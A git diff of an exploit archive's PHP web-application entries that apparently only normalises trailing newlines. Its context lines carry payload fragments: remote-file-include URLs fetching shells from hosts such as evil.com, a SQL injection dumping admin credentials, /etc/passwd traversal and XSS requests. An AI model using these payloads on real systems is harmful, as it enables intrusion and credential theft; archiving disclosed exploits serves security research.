a/platforms/php/webapps/2884.txt +++ b/platforms/php/webapps/2884.txt @@ -102,4 +102,4 @@ Bug))\r\n"; exit(); } -# milw0rm.com [2006-12-02] +# milw0rm.com [2006-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/2885.txt b/platforms/php/webapps/2885.txt index a8b221e0e..fe7debbd1 100755 --- a/platforms/php/webapps/2885.txt +++ b/platforms/php/webapps/2885.txt @@ -21,4 +21,4 @@ bd0rk ---> German Hacker [white hat] :-) -# milw0rm.com [2006-12-02] +# milw0rm.com [2006-12-02] \ No newline at end of file diff --git a/platforms/php/webapps/2886.txt b/platforms/php/webapps/2886.txt index 0da48723c..d1034719f 100755 --- a/platforms/php/webapps/2886.txt +++ b/platforms/php/webapps/2886.txt @@ -64,4 +64,4 @@ Gr33tz: sASAn,marcel3miasto,masS,kaziq,Abi,kociaq,SlashBeast,chochlik,rfl,d3m0n ************************************************************************************************************************* -# milw0rm.com [2006-12-03] +# milw0rm.com [2006-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/2888.php b/platforms/php/webapps/2888.php index de2bc3edb..df599acf1 100755 --- a/platforms/php/webapps/2888.php +++ b/platforms/php/webapps/2888.php @@ -459,4 +459,4 @@ echo "Exploit err0r :(\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2006-12-03] +# milw0rm.com [2006-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/2889.pl b/platforms/php/webapps/2889.pl index 86857a7ed..787f6a1f7 100755 --- a/platforms/php/webapps/2889.pl +++ b/platforms/php/webapps/2889.pl @@ -270,4 +270,4 @@ HTTP/1.1\n"; $cmd =~ s/ /%20/g; } -# milw0rm.com [2006-12-03] +# milw0rm.com [2006-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/28893.pl b/platforms/php/webapps/28893.pl index 522395f9d..da691ccbc 100755 --- a/platforms/php/webapps/28893.pl +++ b/platforms/php/webapps/28893.pl @@ -123,5 +123,4 @@ Version 2.2 is vulnerable to this issue; other versions may also be affected. }; exit(); - } - + } \ No newline at end of file diff --git a/platforms/php/webapps/2890.txt b/platforms/php/webapps/2890.txt index f9ef08022..8bcecd7d9 100755 --- a/platforms/php/webapps/2890.txt +++ b/platforms/php/webapps/2890.txt @@ -75,4 +75,4 @@ http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif --------------------------------------|| Free Saddam Hussien ||----------------------------------------- -# milw0rm.com [2006-12-03] +# milw0rm.com [2006-12-03] \ No newline at end of file diff --git a/platforms/php/webapps/2891.txt b/platforms/php/webapps/2891.txt index 0ef5558b0..c6c47cd49 100755 --- a/platforms/php/webapps/2891.txt +++ b/platforms/php/webapps/2891.txt @@ -27,4 +27,4 @@ www.Deltasecurity.ir Sp Tnx For All Admin And All Member EXCEPT DR.TROJAN Sp Tnx For Dr.Pantagon For Learning Find Bug -# milw0rm.com [2006-12-04] +# milw0rm.com [2006-12-04] \ No newline at end of file diff --git a/platforms/php/webapps/28922.txt b/platforms/php/webapps/28922.txt index 4b0115c1a..f749876c8 100755 --- a/platforms/php/webapps/28922.txt +++ b/platforms/php/webapps/28922.txt @@ -6,5 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -/admin/code/index.php?load_page=http%3A//google.com ( no login needed for the remote file include ) - +/admin/code/index.php?load_page=http%3A//google.com ( no login needed for the remote file include ) \ No newline at end of file diff --git a/platforms/php/webapps/28925.txt b/platforms/php/webapps/28925.txt index 8d65f855a..3030024af 100755 --- a/platforms/php/webapps/28925.txt +++ b/platforms/php/webapps/28925.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql] +http://www.example.com/public/code/cp_forum_view.php?choosed_language=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/28933.txt b/platforms/php/webapps/28933.txt index b9d3667ee..ba67a429b 100755 --- a/platforms/php/webapps/28933.txt +++ b/platforms/php/webapps/28933.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica AIOCP 1.3.007 and prior versions are vulnerable. -http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql] +http://www.example.com/public/code/cp_codice_fiscale.php?choosed_language=[sql] \ No newline at end of file diff --git a/platforms/php/webapps/28935.txt b/platforms/php/webapps/28935.txt index 883d1e56d..23089d4cd 100755 --- a/platforms/php/webapps/28935.txt +++ b/platforms/php/webapps/28935.txt @@ -66,6 +66,4 @@ Full Path Disclosure = http://www.example.com/public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main - http://www.example.com/public/code/cp_show_ec_products.php?order_field[]= -- http://www.example.com/public/code/cp_show_page_help.php?hp[]= - - +- http://www.example.com/public/code/cp_show_page_help.php?hp[]= \ No newline at end of file diff --git a/platforms/php/webapps/2894.txt b/platforms/php/webapps/2894.txt index ad63e1faf..1822bfebf 100755 --- a/platforms/php/webapps/2894.txt +++ b/platforms/php/webapps/2894.txt @@ -30,4 +30,4 @@ Thanx To: ShockShadow & AL-SHIKH WwW.Yee7.CoM =========================================================== -# milw0rm.com [2006-12-06] +# milw0rm.com [2006-12-06] \ No newline at end of file diff --git a/platforms/php/webapps/2895.pl b/platforms/php/webapps/2895.pl index a9595f23d..3a2165ef8 100755 --- a/platforms/php/webapps/2895.pl +++ b/platforms/php/webapps/2895.pl @@ -104,4 +104,4 @@ Example: perl exploit.pl http://www.site.com/jowamp/ exit(); } -# milw0rm.com [2006-12-07] +# milw0rm.com [2006-12-07] \ No newline at end of file diff --git a/platforms/php/webapps/28956.txt b/platforms/php/webapps/28956.txt index 47a5608fe..1468d371e 100755 --- a/platforms/php/webapps/28956.txt +++ b/platforms/php/webapps/28956.txt @@ -62,4 +62,4 @@ - http://[host]/index.php?action=doc&title=../../../../../../../../etc/passwd # Solution: - - Upgrade to latest version : http://status.net/download + - Upgrade to latest version : http://status.net/download \ No newline at end of file diff --git a/platforms/php/webapps/2896.txt b/platforms/php/webapps/2896.txt index 9bc07e0d6..05419940c 100755 --- a/platforms/php/webapps/2896.txt +++ b/platforms/php/webapps/2896.txt @@ -96,4 +96,4 @@ Example: perl exploit.pl http://www.site.com/[tucows]/ exit(); } -# milw0rm.com [2006-12-08] +# milw0rm.com [2006-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/28960.py b/platforms/php/webapps/28960.py index 0da98fd05..72d9ac27c 100755 --- a/platforms/php/webapps/28960.py +++ b/platforms/php/webapps/28960.py @@ -56,4 +56,4 @@ def parse_args(): return options if __name__ == "__main__": - run(parse_args()) + run(parse_args()) \ No newline at end of file diff --git a/platforms/php/webapps/2897.txt b/platforms/php/webapps/2897.txt index 7dc7371bc..ee3621e5a 100755 --- a/platforms/php/webapps/2897.txt +++ b/platforms/php/webapps/2897.txt @@ -4,4 +4,4 @@ Credits: Paul Bakoyiannis Vulnerable Variable: addpath Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?& -# milw0rm.com [2006-12-08] +# milw0rm.com [2006-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/28970.txt b/platforms/php/webapps/28970.txt index dd27d4b46..f3017fde8 100755 --- a/platforms/php/webapps/28970.txt +++ b/platforms/php/webapps/28970.txt @@ -98,6 +98,4 @@ DISCLAIMER nullsecurity.net hereby emphasize, that the information which is published here are for education purposes only. nullsecurity.net does not take any -responsibility for any abuse or misusage! - - +responsibility for any abuse or misusage! \ No newline at end of file diff --git a/platforms/php/webapps/2898.txt b/platforms/php/webapps/2898.txt index 1f4f2c09d..de2895056 100755 --- a/platforms/php/webapps/2898.txt +++ b/platforms/php/webapps/2898.txt @@ -105,4 +105,4 @@ while ($cmd !~ "exit") print "[!] Connection to host lost...\n"; -# milw0rm.com [2006-12-08] +# milw0rm.com [2006-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/2899.txt b/platforms/php/webapps/2899.txt index f5fae779b..dde1458a9 100755 --- a/platforms/php/webapps/2899.txt +++ b/platforms/php/webapps/2899.txt @@ -29,4 +29,4 @@ password : 1%20union%20select%%20201,2,3,4/* / pafile/pafiledb.php?action=admin logged... -# milw0rm.com [2006-12-08] +# milw0rm.com [2006-12-08] \ No newline at end of file diff --git a/platforms/php/webapps/29019.txt b/platforms/php/webapps/29019.txt index af77966d3..71c19988f 100755 --- a/platforms/php/webapps/29019.txt +++ b/platforms/php/webapps/29019.txt @@ -403,6 +403,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or researc -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/2902.pl b/platforms/php/webapps/2902.pl index 499eedd00..233ae42a2 100755 --- a/platforms/php/webapps/2902.pl +++ b/platforms/php/webapps/2902.pl @@ -157,4 +157,4 @@ print "[!] Connection to host lost...\n"; # This has been another r0ut3r discovery - writ3r [at] gmail.com # ################################################################################################# -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/29020.txt b/platforms/php/webapps/29020.txt index c903e1921..eba6e0a73 100755 --- a/platforms/php/webapps/29020.txt +++ b/platforms/php/webapps/29020.txt @@ -77,6 +77,4 @@ High STATUS ====== -Not Fixed - - +Not Fixed \ No newline at end of file diff --git a/platforms/php/webapps/2903.pl b/platforms/php/webapps/2903.pl index 28746586c..19acc4f09 100755 --- a/platforms/php/webapps/2903.pl +++ b/platforms/php/webapps/2903.pl @@ -123,4 +123,4 @@ print "[!] Connection to host lost...\n"; # This has been another r0ut3r discovery - writ3r [at] gmail.com # ################################################################################################# -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/2904.txt b/platforms/php/webapps/2904.txt index 1039c0b77..74983b28b 100755 --- a/platforms/php/webapps/2904.txt +++ b/platforms/php/webapps/2904.txt @@ -18,4 +18,4 @@ Code: include_once($module_root_path . 'includes/lang_extend_mac.'.$phpEx); Usage: http://[y0uRSiTe]/[direct0ry]/includes/profilcp_constants.php?module_root_path=http://Sh3LL? -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/2905.txt b/platforms/php/webapps/2905.txt index 8791f4141..a99856eda 100755 --- a/platforms/php/webapps/2905.txt +++ b/platforms/php/webapps/2905.txt @@ -103,4 +103,4 @@ Example: perl delta.pl http://www.site.com/[gizzar]/ exit(); } -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/2906.pl b/platforms/php/webapps/2906.pl index 675415a11..12c651ac7 100755 --- a/platforms/php/webapps/2906.pl +++ b/platforms/php/webapps/2906.pl @@ -55,4 +55,4 @@ exit; #--------------------- #bY dC³ - Crew ... -# milw0rm.com [2006-12-09] +# milw0rm.com [2006-12-09] \ No newline at end of file diff --git a/platforms/php/webapps/29065.txt b/platforms/php/webapps/29065.txt index 658b70bbe..8653c64fb 100755 --- a/platforms/php/webapps/29065.txt +++ b/platforms/php/webapps/29065.txt @@ -20,4 +20,4 @@ Example: POST: tid[sqltype]=TABLEJOIN&tid[value]=-1 union select 1,0,0,0,0,0,0,0,0,0,0,(SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,password SEPARATOR 0x2c20) FROM tbladmins),0,0,0,0,0,0,0,0,0,0,0# -Have fun! +Have fun! \ No newline at end of file diff --git a/platforms/php/webapps/2913.php b/platforms/php/webapps/2913.php index d0ab47754..f8f2f1c2b 100755 --- a/platforms/php/webapps/2913.php +++ b/platforms/php/webapps/2913.php @@ -247,4 +247,4 @@ echo "Exploit err0r :(\r\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2006-12-10] +# milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/platforms/php/webapps/2917.txt b/platforms/php/webapps/2917.txt index 1e0a34777..28911ef33 100755 --- a/platforms/php/webapps/2917.txt +++ b/platforms/php/webapps/2917.txt @@ -12,4 +12,4 @@ => Special Fixtip: Declare $module_root_path or use Hacking Attempt -# milw0rm.com [2006-12-11] +# milw0rm.com [2006-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/29183.txt b/platforms/php/webapps/29183.txt index abc106bf0..635868f0c 100755 --- a/platforms/php/webapps/29183.txt +++ b/platforms/php/webapps/29183.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t WebHost Manager version 3.1.0 is vulnerable; other versions may also be affected. -http://www.example.com:2086/cgi/addon_configsupport.cgi?cgiaction=save&supportaddy=Domain.name&emailpipecmd=Domain.name&displaybrowserbody=1&displaybrowsersubject=1&displaydomainbody=1&displaydomainsubject=1&displayhostnamebody=1&displayhostnamesubject=1&displayipbody=1&displayipsubject=1&displayuserbody=1&displayusersubject=1&type=redirect&supporturl=XSS +http://www.example.com:2086/cgi/addon_configsupport.cgi?cgiaction=save&supportaddy=Domain.name&emailpipecmd=Domain.name&displaybrowserbody=1&displaybrowsersubject=1&displaydomainbody=1&displaydomainsubject=1&displayhostnamebody=1&displayhostnamesubject=1&displayipbody=1&displayipsubject=1&displayuserbody=1&displayusersubject=1&type=redirect&supporturl=XSS \ No newline at end of file diff --git a/platforms/php/webapps/29187.txt b/platforms/php/webapps/29187.txt index cb1e9991d..cfc69c03a 100755 --- a/platforms/php/webapps/29187.txt +++ b/platforms/php/webapps/29187.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to have arbitrary script code execute in t WebHost Manager version 3.1.0 is vulnerable; other versions may also be affected. -http://www.example.com:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS +http://www.example.com:2086/scripts2/dofeaturemanager?action=addfeature&feature=XSS \ No newline at end of file diff --git a/platforms/php/webapps/2919.pl b/platforms/php/webapps/2919.pl index 47a5edb58..e5e3e1ff5 100755 --- a/platforms/php/webapps/2919.pl +++ b/platforms/php/webapps/2919.pl @@ -22,4 +22,4 @@ PoC: # exploit was broken and removed. /str0ke -# milw0rm.com [2006-12-11] +# milw0rm.com [2006-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/2920.txt b/platforms/php/webapps/2920.txt index 7807df8d7..b667bd39a 100755 --- a/platforms/php/webapps/2920.txt +++ b/platforms/php/webapps/2920.txt @@ -36,4 +36,4 @@ SP TNX : Dr.Pantagon ********************************************************************************************************** -# milw0rm.com [2006-12-11] +# milw0rm.com [2006-12-11] \ No newline at end of file diff --git a/platforms/php/webapps/29203.php b/platforms/php/webapps/29203.php index 787155005..59523bcb9 100755 --- a/platforms/php/webapps/29203.php +++ b/platforms/php/webapps/29203.php @@ -35,4 +35,4 @@ C83%2C83%29%29%3C%2FSCRIPT%3E%3D%26%7B%7D&r_timeformat=H%3Ai&r_startweek=1&r_tim yg=0&r_styleid=0&r_langid=0&send=send&sid=&disclaimer='); curl_exec($ch); curl_close($ch); -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/2921.txt b/platforms/php/webapps/2921.txt index 1f9721b8d..6b86ea664 100755 --- a/platforms/php/webapps/2921.txt +++ b/platforms/php/webapps/2921.txt @@ -21,4 +21,4 @@ Code:http://[target]/[patH]/includes/common.php?module_root_path=http://Ev!LScr! Greetings: Bdrok - TheJT - MyMaster - str0ke - 404-crew.de.vu ************************************************************* -# milw0rm.com [2006-12-12] +# milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/2923.txt b/platforms/php/webapps/2923.txt index b21309ad4..6aaadea99 100755 --- a/platforms/php/webapps/2923.txt +++ b/platforms/php/webapps/2923.txt @@ -10,4 +10,4 @@ include ( substr($DIR_ADMIN,0,strpos($DIR_ADMIN,'admin'))."photo".DIRECTORY_SEPA http://site.com/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=http://www.soqor.net/tools/cmd.txt?admin -# milw0rm.com [2006-12-12] +# milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/2924.txt b/platforms/php/webapps/2924.txt index 74cd8522c..242d8f854 100755 --- a/platforms/php/webapps/2924.txt +++ b/platforms/php/webapps/2924.txt @@ -32,4 +32,4 @@ Thx to:str0ke & All My Friends Special Gr33ts:AsianEagle & The Master & Kacper & HotTurk =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-= -# milw0rm.com [2006-12-12] +# milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/2925.pl b/platforms/php/webapps/2925.pl index 704bc02fc..078f40967 100755 --- a/platforms/php/webapps/2925.pl +++ b/platforms/php/webapps/2925.pl @@ -95,4 +95,4 @@ Example: exploit.pl http://www.site.com/[path]/ exit(); } -# milw0rm.com [2006-12-12] +# milw0rm.com [2006-12-12] \ No newline at end of file diff --git a/platforms/php/webapps/29255.txt b/platforms/php/webapps/29255.txt index 6225e99b7..052d56424 100755 --- a/platforms/php/webapps/29255.txt +++ b/platforms/php/webapps/29255.txt @@ -6,5 +6,4 @@ A successful exploit may allow unauthorized users to view files, to execute arbi KDPics 1.16 and prior versions are vulnerable. -http://www.example.com/[kdpics_path]/galeries.inc.php3?categories=[XSS] - +http://www.example.com/[kdpics_path]/galeries.inc.php3?categories=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/29258.txt b/platforms/php/webapps/29258.txt index b845602c7..9463a15b8 100755 --- a/platforms/php/webapps/29258.txt +++ b/platforms/php/webapps/29258.txt @@ -11,4 +11,4 @@ http://www.site.com/[phprssreader]/null'%20/*!uNION*/%20/*!select*/%201,2,3,/*!c By : rDNix -Contact : Mynamemishal@gmail.com +Contact : Mynamemishal@gmail.com \ No newline at end of file diff --git a/platforms/php/webapps/29264.txt b/platforms/php/webapps/29264.txt index d2fcc0f91..e1bf5b79e 100755 --- a/platforms/php/webapps/29264.txt +++ b/platforms/php/webapps/29264.txt @@ -208,6 +208,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or researc -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/29265.txt b/platforms/php/webapps/29265.txt index cf6ebce2e..4bda7c8b2 100755 --- a/platforms/php/webapps/29265.txt +++ b/platforms/php/webapps/29265.txt @@ -235,6 +235,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or researc -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/2927.txt b/platforms/php/webapps/2927.txt index 5cf20549a..2a56dd1b9 100755 --- a/platforms/php/webapps/2927.txt +++ b/platforms/php/webapps/2927.txt @@ -38,4 +38,4 @@ ######################################################################################### -# milw0rm.com [2006-12-13] +# milw0rm.com [2006-12-13] \ No newline at end of file diff --git a/platforms/php/webapps/29279.txt b/platforms/php/webapps/29279.txt index a1a203c12..404dbc33a 100755 --- a/platforms/php/webapps/29279.txt +++ b/platforms/php/webapps/29279.txt @@ -183,6 +183,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or researc -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/29280.txt b/platforms/php/webapps/29280.txt index dd7a9e5ee..7e8992856 100755 --- a/platforms/php/webapps/29280.txt +++ b/platforms/php/webapps/29280.txt @@ -293,6 +293,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or researc -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/29289.php b/platforms/php/webapps/29289.php index 57f8ebae8..f8b19f1bf 100755 --- a/platforms/php/webapps/29289.php +++ b/platforms/php/webapps/29289.php @@ -510,4 +510,4 @@ die($temp[1]); echo "Exploit err0r :(\n"; echo "Check register_globals = On and magic_quotes_gpc = off\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/2930.pl b/platforms/php/webapps/2930.pl index 297dc2092..a21bcdb2a 100755 --- a/platforms/php/webapps/2930.pl +++ b/platforms/php/webapps/2930.pl @@ -106,4 +106,4 @@ Example: perl delta.pl http://www.site.com/[yaplap]/ exit(); } -# milw0rm.com [2006-12-14] +# milw0rm.com [2006-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/2931.txt b/platforms/php/webapps/2931.txt index d3d457798..8d56d0c3a 100755 --- a/platforms/php/webapps/2931.txt +++ b/platforms/php/webapps/2931.txt @@ -31,4 +31,4 @@ Dork: "Members Statistics" +"Total Members" +"Guests Online" # Greetz; Caution, Raph13, Yeast, Xpontius and all former Inf Crew members & all XeN Members. # IRC: irc.milw0rm.com:6667 #esk -# milw0rm.com [2006-12-14] +# milw0rm.com [2006-12-14] \ No newline at end of file diff --git a/platforms/php/webapps/29318.txt b/platforms/php/webapps/29318.txt index ae2ef81b5..60d5d4e91 100755 --- a/platforms/php/webapps/29318.txt +++ b/platforms/php/webapps/29318.txt @@ -131,5 +131,4 @@ Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1 g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId= -... - +... \ No newline at end of file diff --git a/platforms/php/webapps/29328.txt b/platforms/php/webapps/29328.txt index 492b4bbc3..13bf5d2b6 100755 --- a/platforms/php/webapps/29328.txt +++ b/platforms/php/webapps/29328.txt @@ -52,4 +52,4 @@ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1 -g=administrator&m=repository&a=deleteFiles&files%5B0%5D%5BfileName%5D=readme.txt&files%5B0%5D%5Bdir%5D=file%2Frepository%2F&files%5B0%5D%5Bfile%5D=/../../../joxy.txt&files%5B0%5D%5Bext%5D=txt&files%5B0%5D%5Bpreview%5D=ip_cms%2Fmodules%2Fadministrator%2Frepository%2Fpublic%2Fadmin%2Ficons%2Fgeneral.png&files%5B0%5D%5Bmodified%5D=1381393098&securityToken=c029f7293955df089676b78af8222d2a +g=administrator&m=repository&a=deleteFiles&files%5B0%5D%5BfileName%5D=readme.txt&files%5B0%5D%5Bdir%5D=file%2Frepository%2F&files%5B0%5D%5Bfile%5D=/../../../joxy.txt&files%5B0%5D%5Bext%5D=txt&files%5B0%5D%5Bpreview%5D=ip_cms%2Fmodules%2Fadministrator%2Frepository%2Fpublic%2Fadmin%2Ficons%2Fgeneral.png&files%5B0%5D%5Bmodified%5D=1381393098&securityToken=c029f7293955df089676b78af8222d2a \ No newline at end of file diff --git a/platforms/php/webapps/29331.txt b/platforms/php/webapps/29331.txt index 482539450..e82c71df9 100755 --- a/platforms/php/webapps/29331.txt +++ b/platforms/php/webapps/29331.txt @@ -286,4 +286,4 @@ while True: logging.warning('\n\n END OF LOG') print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET print '\x20\x20[*] File '+Fore.YELLOW+fname+Fore.RESET+'\x20'+'.'*19+Fore.GREEN+'[OK]'+Fore.RESET -sys.exit() +sys.exit() \ No newline at end of file diff --git a/platforms/php/webapps/29354.txt b/platforms/php/webapps/29354.txt index 57b631fcc..fb7698d1d 100755 --- a/platforms/php/webapps/29354.txt +++ b/platforms/php/webapps/29354.txt @@ -167,6 +167,4 @@ modify, use or edit our material contact (admin@vulnerability-lab.com or researc -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com -CONTACT: research@vulnerability-lab.com - - +CONTACT: research@vulnerability-lab.com \ No newline at end of file diff --git a/platforms/php/webapps/2937.php b/platforms/php/webapps/2937.php index a30da1dd0..1a61dc1f2 100755 --- a/platforms/php/webapps/2937.php +++ b/platforms/php/webapps/2937.php @@ -512,4 +512,4 @@ echo "Check register_globals = On and magic_quotes_gpc = off\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2006-12-16] +# milw0rm.com [2006-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/2938.htm b/platforms/php/webapps/2938.htm index d6fdd3b6a..4a1fcdb0c 100755 --- a/platforms/php/webapps/2938.htm +++ b/platforms/php/webapps/2938.htm @@ -35,4 +35,4 @@ Special Thx: Dr.Max.Virus,GencTurk,Str0ke,SawTurk,Chironex Fleckeri,Unique-key,K "BUNDAN OTESÝ YA ÝSTÝKLAL YA OLUM" --> -# milw0rm.com [2006-12-16] +# milw0rm.com [2006-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/2939.txt b/platforms/php/webapps/2939.txt index 0daec21a0..a82ba63de 100755 --- a/platforms/php/webapps/2939.txt +++ b/platforms/php/webapps/2939.txt @@ -25,4 +25,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-16] +# milw0rm.com [2006-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/29397.php b/platforms/php/webapps/29397.php index 27d467506..13094ddae 100755 --- a/platforms/php/webapps/29397.php +++ b/platforms/php/webapps/29397.php @@ -188,4 +188,4 @@ for($i=0;$i +?> \ No newline at end of file diff --git a/platforms/php/webapps/2940.txt b/platforms/php/webapps/2940.txt index e54577620..0cdb33004 100755 --- a/platforms/php/webapps/2940.txt +++ b/platforms/php/webapps/2940.txt @@ -24,4 +24,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-16] +# milw0rm.com [2006-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/2941.txt b/platforms/php/webapps/2941.txt index bedc4c8cd..2655438e2 100755 --- a/platforms/php/webapps/2941.txt +++ b/platforms/php/webapps/2941.txt @@ -24,4 +24,4 @@ Example: # Im not Hacker! -# milw0rm.com [2006-12-16] +# milw0rm.com [2006-12-16] \ No newline at end of file diff --git a/platforms/php/webapps/2943.txt b/platforms/php/webapps/2943.txt index 2c63ac731..fa6391c89 100755 --- a/platforms/php/webapps/2943.txt +++ b/platforms/php/webapps/2943.txt @@ -20,4 +20,4 @@ + http://[target]/[path]/admin/index_sitios.php?_VIEW=http://evilsite.com/shell.php +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-18] +# milw0rm.com [2006-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/2944.txt b/platforms/php/webapps/2944.txt index 2b9217ba0..281272da3 100755 --- a/platforms/php/webapps/2944.txt +++ b/platforms/php/webapps/2944.txt @@ -211,4 +211,4 @@ echo "Exploit err0r :(\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\n"; ?> -# milw0rm.com [2006-12-18] +# milw0rm.com [2006-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/2945.txt b/platforms/php/webapps/2945.txt index 8b2ccdc69..12206da01 100755 --- a/platforms/php/webapps/2945.txt +++ b/platforms/php/webapps/2945.txt @@ -13,4 +13,4 @@ # Greetz: str0ke , Dr Max Virus , Kacper ######################################################################## -# milw0rm.com [2006-12-18] +# milw0rm.com [2006-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/29476.txt b/platforms/php/webapps/29476.txt index 079a4b38a..e7648442b 100755 --- a/platforms/php/webapps/29476.txt +++ b/platforms/php/webapps/29476.txt @@ -93,4 +93,4 @@ nullsecurity.net hereby emphasize, that the information which is published here for education purposes only. nullsecurity.net does not take any responsibility for any abuse or misusage! - Copyright (c) 2011 - nullsecurity.net + Copyright (c) 2011 - nullsecurity.net \ No newline at end of file diff --git a/platforms/php/webapps/2948.txt b/platforms/php/webapps/2948.txt index 4f5c73986..225767064 100755 --- a/platforms/php/webapps/2948.txt +++ b/platforms/php/webapps/2948.txt @@ -47,4 +47,4 @@ # ######################################################################################################## -# milw0rm.com [2006-12-18] +# milw0rm.com [2006-12-18] \ No newline at end of file diff --git a/platforms/php/webapps/29482.php b/platforms/php/webapps/29482.php index c0bfd45ce..8c6728ed4 100755 --- a/platforms/php/webapps/29482.php +++ b/platforms/php/webapps/29482.php @@ -28,9 +28,4 @@ http://127.0.0.1/wordpress/wp-content/uploads/2013/11/upload.php -All http://www.mavi1.org members - - - - - +All http://www.mavi1.org members \ No newline at end of file diff --git a/platforms/php/webapps/29508.sh b/platforms/php/webapps/29508.sh index ee058eb90..7b26e501d 100755 --- a/platforms/php/webapps/29508.sh +++ b/platforms/php/webapps/29508.sh @@ -161,5 +161,4 @@ admin's settings page" echo "bad luck" fi sleep 5 -done - +done \ No newline at end of file diff --git a/platforms/php/webapps/29512.txt b/platforms/php/webapps/29512.txt index 69026bb6c..d05698413 100755 --- a/platforms/php/webapps/29512.txt +++ b/platforms/php/webapps/29512.txt @@ -86,5 +86,4 @@ Vulnerability discovered by Egidio Romano. [-] Original Advisory: -http://karmainsecurity.com/KIS-2013-09 - +http://karmainsecurity.com/KIS-2013-09 \ No newline at end of file diff --git a/platforms/php/webapps/29525.txt b/platforms/php/webapps/29525.txt index ab125cb14..fbf428cb8 100755 --- a/platforms/php/webapps/29525.txt +++ 